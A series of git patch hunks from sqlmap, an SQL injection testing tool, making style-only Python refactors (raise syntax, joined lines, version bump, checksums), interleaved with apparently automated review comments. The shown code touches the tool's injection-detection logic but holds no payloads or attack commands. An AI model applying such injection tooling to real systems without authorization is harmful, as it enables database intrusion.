@@ -47,7 +47,7 @@ def adjust(self): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % self.current raise SqlmapDataException(errMsg) @@ -73,7 +73,7 @@ def next(self): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) except StopIteration: self.adjust() retVal = self.iter.next().rstrip() diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 83161b686f2..832884f31d8 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -909,7 +909,7 @@ def _(self, *args): for arg in shlex.split(command): argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) except ValueError, ex: - raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message + raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % ex.message) for i in xrange(len(argv)): if argv[i] == "-hh": diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index 9f8d5a41bea..0eda511951f 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -78,7 +78,7 @@ def loadBoundaries(): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) root = doc.getroot() parseXmlNode(root) 
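Review bot: The rewritten `raise SqlmapSyntaxException(...)` in the cmdline.py hunk still formats with `ex.message`, which is the deprecated attribute the rest of this patch avoids; `"something went wrong during command line parsing ('%s')" % getSafeExString(ex)` matches the wordlist.py and payloads.py hunks of the same commit (assuming the helper is importable from cmdline.py, which the hunk does not show). The `except ValueError, ex:` comma form on the line above is the same Python 2-only idiom and could be converted in the same pass. The enclosing function `_` begins before this hunk.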
@@ -93,7 +93,7 @@ def loadPayloads(): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) root = doc.getroot() parseXmlNode(root) diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py index 6724ceb0ed6..3c503f9fb12 100644 --- a/lib/parse/sitemap.py +++ b/lib/parse/sitemap.py @@ -32,7 +32,7 @@ def parseSitemap(url, retVal=None): content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" except httplib.InvalidURL: errMsg = "invalid URL given for sitemap ('%s')" % url - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) for match in re.finditer(r"\s*([^<]+)", content or ""): if abortedFlag: diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index cd115e6fc9d..81f4943130a 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -30,10 +30,8 @@ def http_error_auth_reqed(self, auth_header, host, req, headers): self.retried_count = 0 else: if self.retried_count > 5: - raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", - headers, None) + raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None) else: self.retried_count += 1 - return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed( - self, auth_header, host, req, headers) + return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers) diff --git a/lib/request/connect.py b/lib/request/connect.py index 344a093d678..2825c18b4c7 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
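Review bot: In the basicauthhandler.py hunk the retry cap on the `if self.retried_count > 5:` line is a bare magic number guarding what is presumably a loop-breaker against endless 401 round-trips; naming it makes that visible: `MAX_BASIC_AUTH_RETRIES = 5  # stop re-sending credentials after this many consecutive 401s` at module level and `if self.retried_count > MAX_BASIC_AUTH_RETRIES:` here. The joined `raise`/`return` lines are otherwise equivalent to the removed ones. `http_error_auth_reqed` begins before this hunk.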
@@ -982,7 +982,7 @@ def _adjustParameter(paramString, parameter, newValue): if not conf.csrfUrl: errMsg += ". You can try to rerun by providing " errMsg += "a valid value for option '--csrf-url'" - raise SqlmapTokenException, errMsg + raise SqlmapTokenException(errMsg) if token: token = token.strip("'\"") diff --git a/lib/utils/api.py b/lib/utils/api.py index 28f0a6c26f9..d40cc17977c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -277,7 +277,7 @@ def setRestAPILog(): conf.databaseCursor = Database(conf.database) conf.databaseCursor.connect("client") except sqlite3.OperationalError, ex: - raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database) + raise SqlmapConnectionException("%s ('%s')" % (ex, conf.database)) # Set a logging handler that writes log messages to a IPC database logger.removeHandler(LOGGER_HANDLER) diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 8f3c91e35d3..95ce6bbce5d 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -92,7 +92,7 @@ def retrieve(self, key, unserialize=False): except sqlite3.DatabaseError, ex: errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) errMsg += "If the problem persists please rerun with `--flush-session`" - raise SqlmapConnectionException, errMsg + raise SqlmapConnectionException(errMsg) else: break diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 3644a6d2453..7dfc593096b 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -46,7 +46,7 @@ def connect(self): try: if not self.port and self.db: if not os.path.exists(self.db): - raise SqlmapFilePathException, "the provided database file '%s' does not exist" % self.db + raise SqlmapFilePathException("the provided database file '%s' does not exist" % self.db) _ = conf.direct.split("//", 1) conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6ec32bb0ab7..9c99b170d66 100644 
--- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -26,9 +26,9 @@ e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 052c368ae6ca09362a19376c8483fa85 lib/core/agent.py -86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -80087ee0716904b24c7970beed20cf27 lib/core/common.py -2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py +591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py +6e41ff058eb86b824215c19a3ae4de3c lib/core/common.py +2910524e4478be6b5893fb9d851a62ec lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py -a377168b153725d3677924040b7861f4 lib/core/option.py +8a9346b975931d8d995354692ab68f82 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e9da51e9fb8e345f5a8bde0f219b696 lib/core/settings.py +aef027eeb51df0bb7330bf35725dba66 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py 
@@ -54,21 +54,21 @@ d0adc28a38e43a787df4471f7f027413 lib/core/shell.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py 1b655a78fe4d937d39131938a4a5a1d6 lib/core/update.py -fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py +e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -27c4d3e568d199e01d1cffd37b370516 lib/parse/cmdline.py +d505c725f5d6887ec80b5b94ca1dc9f5 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -307d4001682f38dd574548d98c0f1c3e lib/parse/payloads.py -38563853a32dd677ce6c65a0945d7227 lib/parse/sitemap.py -4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py +ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py +492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py +30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -9b31df4b00b1709948e7f0568d69d7de lib/request/connect.py +94c0ce8d2a2d9001a416420f61b67ee7 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py 
@@ -98,13 +98,13 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py -e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py +609ba6e5039de4814115b966cd72645a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py 69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py -9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py +062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py 55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py @@ -112,7 +112,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py -4b17311256f0081904a67831252e3fb9 lib/utils/sqlalchemy.py +236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py From 8166a4eeb814314a2b23331453df3aaf2dd83563 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 11:25:26 +0100 Subject: [PATCH 067/428] Minor PEPing --- lib/core/common.py | 26 +++++++++++++------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 16 insertions(+), 16 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index c9ad85a2545..3f307b1d279 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -1443,13 +1443,14 @@ def parseTargetUrl(): conf.hostname = conf.hostname.strip("[]").replace(kb.customInjectionMark, "") try: - _ = conf.hostname.encode("idna") - except LookupError: - _ = conf.hostname.encode(UNICODE_ENCODING) - except UnicodeError: - _ = None + conf.hostname.encode("idna") + conf.hostname.encode(UNICODE_ENCODING) + except (LookupError, UnicodeError): + invalid = True + else: + invalid = False - if any((_ is None, re.search(r"\s", conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\n' in originalUrl)): + if any((invalid, re.search(r"\s", conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\n' in originalUrl)): errMsg = "invalid target URL ('%s')" % originalUrl raise SqlmapSyntaxException(errMsg) @@ -2994,7 +2995,7 @@ def setOptimize(): Sets options turned on by switch '-o' """ - #conf.predictOutput = True + # conf.predictOutput = True conf.keepAlive = True conf.threads = 3 if conf.threads < 3 else conf.threads conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) @@ -3198,9 +3199,7 @@ def showHttpErrorCodes(): if kb.httpErrorCodes: warnMsg = "HTTP error codes detected during run:\n" - warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \ - if code in httplib.responses else '?', count) \ - for code, count in kb.httpErrorCodes.items()) + warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] if code in httplib.responses else '?', count) for code, count in kb.httpErrorCodes.items()) logger.warn(warnMsg) if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()): msg = "too many 4xx and/or 5xx HTTP error codes " 
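Review bot: The `parseTargetUrl` hunk changes behaviour, not just style: a `LookupError` from `encode("idna")` used to fall back to `encode(UNICODE_ENCODING)`, whereas the new `except (LookupError, UnicodeError):` marks the target invalid, and both encodings must now succeed rather than either. The idna codec ships with CPython, so in practice this is likely harmless, but the stricter contract deserves a comment on the `try:` line: `# both encodings must succeed; a missing codec now rejects the host instead of falling back`. The commit message ("Minor PEPing") does not mention it, so a line in the description would help anyone bisecting a rejected-URL report. The function begins before this hunk.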
@@ -3216,8 +3215,7 @@ def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", bu return codecs.open(filename, mode, encoding, errors, buffering) except IOError: errMsg = "there has been a file opening error for filename '%s'. " % filename - errMsg += "Please check %s permissions on a file " % ("write" if \ - mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") + errMsg += "Please check %s permissions on a file " % ("write" if mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") errMsg += "and that it's not locked by another process." raise SqlmapSystemException(errMsg) @@ -4350,7 +4348,9 @@ def prioritySortColumns(columns): ['userid', 'name', 'password'] """ - _ = lambda x: x and "id" in x.lower() + def _(column): + return column and "id" in column.lower() + return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0) def getRequestHeader(request, name): diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d44c80a3e4..93439d4abef 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.21" +VERSION = "1.2.3.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9c99b170d66..dcb2f4f475c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
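Review bot: The `prioritySortColumns` hunk keeps `sorted(sorted(columns, key=len), lambda x, y: ...)`, which passes a comparison function positionally (Python 2-only) and sorts twice where one stable key sort gives the same order: `return sorted(columns, key=lambda c: (not _(c), len(c)))` puts id-bearing columns first and shorter names first within each group, exactly as the two stable passes do. Naming the new local helper something like `_is_id_column` instead of `_` would also help, since `_` is used as a throwaway elsewhere in this file (see the `showHttpErrorCodes` hunk above). The doctest in the docstring, which begins before the hunk, is unaffected because the resulting order is identical.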
@@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 052c368ae6ca09362a19376c8483fa85 lib/core/agent.py 591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py -6e41ff058eb86b824215c19a3ae4de3c lib/core/common.py +33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py 2910524e4478be6b5893fb9d851a62ec lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -aef027eeb51df0bb7330bf35725dba66 lib/core/settings.py +053e81e44a3df054a3ffd39d58de7079 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From fa4c1c5251ce8faaaac2bd9b5ccb5deffd4e074d Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 13 Mar 2018 13:45:42 +0100 Subject: [PATCH 068/428] Some more PEPing (I hope that I haven't broke anything) --- lib/controller/checks.py | 28 +- lib/controller/controller.py | 3 +- lib/controller/handler.py | 26 +- lib/core/agent.py | 24 +- lib/core/bigarray.py | 4 +- lib/core/convert.py | 2 +- lib/core/defaults.py | 28 +- lib/core/dicts.py | 82 ++-- lib/core/enums.py | 56 +-- lib/core/option.py | 6 +- lib/core/optiondict.py | 496 +++++++++++------------ lib/core/profiling.py | 2 +- lib/core/settings.py | 4 +- lib/core/shell.py | 20 +- lib/core/subprocessng.py | 6 - lib/core/target.py | 11 +- lib/parse/cmdline.py | 420 ++++++++------------ lib/parse/headers.py | 12 +- lib/request/basic.py | 6 +- lib/request/connect.py | 45 ++- lib/request/httpshandler.py | 2 +- lib/request/inject.py | 5 +- lib/request/templates.py | 1 - lib/takeover/abstraction.py | 6 +- lib/takeover/metasploit.py | 104 ++--- lib/takeover/registry.py | 18 +- lib/takeover/web.py | 8 +- lib/takeover/xp_cmdshell.py | 2 +- lib/techniques/blind/inference.py | 2 +- lib/techniques/error/use.py | 30 +- lib/techniques/union/use.py | 8 +- lib/utils/api.py | 25 +- lib/utils/crawler.py | 2 +- lib/utils/deps.py | 1 - lib/utils/getch.py | 5 +- lib/utils/hash.py | 71 ++-- lib/utils/htmlentities.py | 504 ++++++++++++------------ lib/utils/progress.py | 3 +- lib/utils/versioncheck.py | 2 +- lib/utils/xrange.py | 2 +- plugins/dbms/access/fingerprint.py | 11 +- plugins/dbms/db2/connector.py | 1 - plugins/dbms/db2/fingerprint.py | 12 +- plugins/dbms/firebird/connector.py | 4 +- plugins/dbms/firebird/fingerprint.py | 12 +- plugins/dbms/hsqldb/connector.py | 9 +- plugins/dbms/informix/connector.py | 1 - plugins/dbms/informix/syntax.py | 2 +- plugins/dbms/maxdb/enumeration.py | 6 +- plugins/dbms/mssqlserver/enumeration.py | 6 +- plugins/dbms/mssqlserver/filesystem.py | 70 ++-- plugins/dbms/mssqlserver/fingerprint.py | 32 +- plugins/dbms/mssqlserver/takeover.py | 25 +- 
plugins/dbms/mysql/__init__.py | 10 +- plugins/dbms/mysql/fingerprint.py | 25 +- plugins/dbms/mysql/takeover.py | 4 +- plugins/dbms/postgresql/__init__.py | 12 +- plugins/dbms/postgresql/syntax.py | 2 +- plugins/dbms/sybase/enumeration.py | 2 +- plugins/generic/databases.py | 13 +- plugins/generic/entries.py | 2 +- plugins/generic/filesystem.py | 2 +- tamper/between.py | 1 - tamper/ifnull2casewhenisnull.py | 2 - txt/checksum.md5 | 130 +++--- waf/safe3.py | 1 - 66 files changed, 1174 insertions(+), 1305 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 26fcb4f3c11..4733f178b90 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -146,8 +146,7 @@ def checkSqlInjection(place, parameter, value): # error message, simple heuristic check or via DBMS-specific # payload), ask the user to limit the tests to the fingerprinted # DBMS - if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \ - SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): + if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]" kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] 
@@ -156,9 +155,7 @@ def checkSqlInjection(place, parameter, value): # message, via simple heuristic check or via DBMS-specific # payload), ask the user to extend the tests to all DBMS-specific, # regardless of --level and --risk values provided - if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \ - and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \ - kb.heuristicDbms or injection.dbms): + if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): msg = "for the remaining tests, do you want to include all tests " msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "level (%d)" % conf.level if conf.level < 5 else "" @@ -242,9 +239,7 @@ def checkSqlInjection(place, parameter, value): # Skip tests if title, vector or DBMS is not included by the # given test filter - if conf.testFilter and not any(conf.testFilter in str(item) or \ - re.search(conf.testFilter, str(item), re.I) for item in \ - (test.title, test.vector, payloadDbms)): + if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)): debugMsg = "skipping test '%s' because its " % title debugMsg += "name/vector/DBMS is not included by the given filter" logger.debug(debugMsg) 
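Review bot: `re.search(conf.testFilter, str(item), re.I)` on the joined line still compiles a user-supplied pattern for every item and raises `re.error` on a malformed one, which the rewrite keeps as-is; unless the option is validated at parse time (not visible here), validating `conf.testFilter` once before the test loop, or catching `re.error` and reporting the bad filter, would be cheaper and clearer. The same applies to the `conf.testSkip` hunk on the next line. The joined conditions in both hunks now run well past any usual line length, so the original `\` continuations were arguably the more readable form. checkSqlInjection's body continues outside the hunk.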
@@ -252,9 +247,7 @@ def checkSqlInjection(place, parameter, value): # Skip tests if title, vector or DBMS is included by the # given skip filter - if conf.testSkip and any(conf.testSkip in str(item) or \ - re.search(conf.testSkip, str(item), re.I) for item in \ - (test.title, test.vector, payloadDbms)): + if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)): debugMsg = "skipping test '%s' because its " % title debugMsg += "name/vector/DBMS is included by the given skip filter" logger.debug(debugMsg) @@ -588,10 +581,10 @@ def genCmpPayload(): # body for the test's regular expression try: page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False) - output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) + output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) + output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) + output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if output: result = output == "1" 
@@ -873,8 +866,7 @@ def checkFalsePositives(injection):
 retVal = True
- if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
- (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
+ if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
 pushValue(kb.injection)
 infoMsg = "checking if the injection point on %s " % injection.place
@@ -971,7 +963,7 @@ def checkFilteredChars(injection):
 # inference techniques depend on character '>'
 if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
- if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
+ if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
 warnMsg = "it appears that the character '>' is "
 warnMsg += "filtered by the back-end server. You are strongly "
 warnMsg += "advised to rerun with the '--tamper=between'"
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 27708c86784..cbe5aef917e 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -406,8 +406,7 @@ def start():
 if conf.nullConnection:
 checkNullConnection()
- if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
- and (kb.injection.place is None or kb.injection.parameter is None):
+ if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
 if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
 # NOTE: this is not needed anymore, leaving only to display
diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 988efd12c1c..6ce752dd28e 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -56,19 +56,19 @@ def setHandler(): """ items = [ - (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn), - (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn), - (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn), - (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn), - (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn), - (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn), - (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn), - (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn), - (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), - (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), - (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), - (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), - ] + (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn), + (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn), + (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn), + (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn), + (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn), + (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn), + (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn), + (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn), + (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), + (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), + (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), + (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), + ] _ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items) if _: diff --git a/lib/core/agent.py b/lib/core/agent.py index e8422bcc3e1..b7bb3c4ea34 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py 
